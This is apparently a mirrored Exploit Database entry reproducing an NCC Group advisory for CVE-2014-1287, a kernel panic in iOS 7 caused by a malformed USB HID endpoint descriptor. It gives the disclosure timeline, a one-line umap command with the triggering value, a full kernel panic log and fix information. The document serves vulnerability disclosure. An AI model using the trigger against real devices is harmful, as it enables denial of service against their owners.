iOS 7 – Kernel Mode Memory Corruption

• Exploit Database
• 151 阅读

• 作者： Andy Davis
  日期： 2014-03-17
• 类别：

  • dos
  平台：

  • ios
• 来源：https://www.exploit-db.com/exploits/32333/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113

  ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Vulnerability Summary ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   Title iOS 7 arbitrary code execution in kernel mode Release Date14 March 2014 Reference NGS00596 DiscovererAndy Davis VendorApple Vendor Reference600217059 Systems AffectediPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later CVE Reference CVE-2014-1287 RiskHigh StatusFixed   ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Resolution Timeline ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   Discovered26 September 2013 Reported26 September 2013 Released26 September 2013 Fixed 10 March 2014 Published 14 March 2014   ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Vulnerability Description ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   When a specific value is supplied in USB Endpoint descriptor for a HID device the Apple device kernel panics and reboots   ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Technical Details ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   The bug can be triggered using umap (https://github.com/nccgroup/umap) as follows:   sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46   bMaxPacketSize = 0xff   Incident Identifier: F0856C91-7616-4DAC-9907-C504401D9951 CrashReporter Key: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b Hardware Model:iPhone3,1 Date/Time: 2013-09-26 12:35:46.892 +0100 OS Version:iOS 7.0 (11A465)   panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1, fault_addr=0x28 r0: 0x00000003r1: 0x889e70bdr2: 0x00000012r3: 0xfffffffe r4: 0x9ae83000r5: 0x00000003r6: 0x00000000r7: 0x87ff3d78 r8: 0x00000000r9: 0x00000000 r10: 0x00000000 r11: 0x00000001 r12:0x87ff3d50sp: 0x87ff3d10lr: 0x88af52bfpc: 0x88af51f8 cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028   Debugger message: panic OS version: 11A465 Kernel version: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013; root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X iBoot version: iBoot-1940.1.75 secure boot?: YES Paniclog version: 1 Kernel slide: 0x0000000008200000 Kernel text base: 0x88201000 Epoch Time:sec usec Boot: 0x52441b69 0x00000000 Sleep : 0x00000000 0x00000000 Wake: 0x00000000 0x00000000 Calendar: 0x52441bb5 0x00056497   Panicked task 0x896f8d48: 12856 pages, 114 threads: pid 0: kernel_task panicked thread: 0x8023de90, backtrace: 0x87ff3a48 lr: 0x88317889fp: 0x87ff3a7c lr: 0x883181f7fp: 0x87ff3ab0 lr: 0x882b783bfp: 0x87ff3ad4 lr: 0x882220a5fp: 0x87ff3ba0 lr: 0x8821c7c4fp: 0x87ff3d78 lr: 0x88af8687fp: 0x87ff3da8 lr: 0x8828b5bdfp: 0x87ff3dd0 lr: 0x889d6d29fp: 0x87ff3df0 lr: 0x889da2f3fp: 0x87ff3e18 lr: 0x8828b5bdfp: 0x87ff3e40 lr: 0x889da14ffp: 0x87ff3e7c lr: 0x88acb8e7fp: 0x87ff3eb8 lr: 0x88ac9815fp: 0x87ff3ed4 lr: 0x884b24d3fp: 0x87ff3f60 lr: 0x882cf869fp: 0x87ff3fa8 lr: 0x8821f05cfp: 0x00000000   ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. Fix Information ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   A patch can be downloaded from the following location: http://support.apple.com/kb/HT1222   ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~. NCC Group ~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.   Research https://www.nccgroup.com/research Twitterhttps://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec Open Sourcehttps://github.com/nccgroup Blog https://www.nccgroup.com/en/blog/cyber-security/ SlideShare http://www.slideshare.net/NCC_Group/     For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br> This email message has been delivered safely and archived online by Mimecast.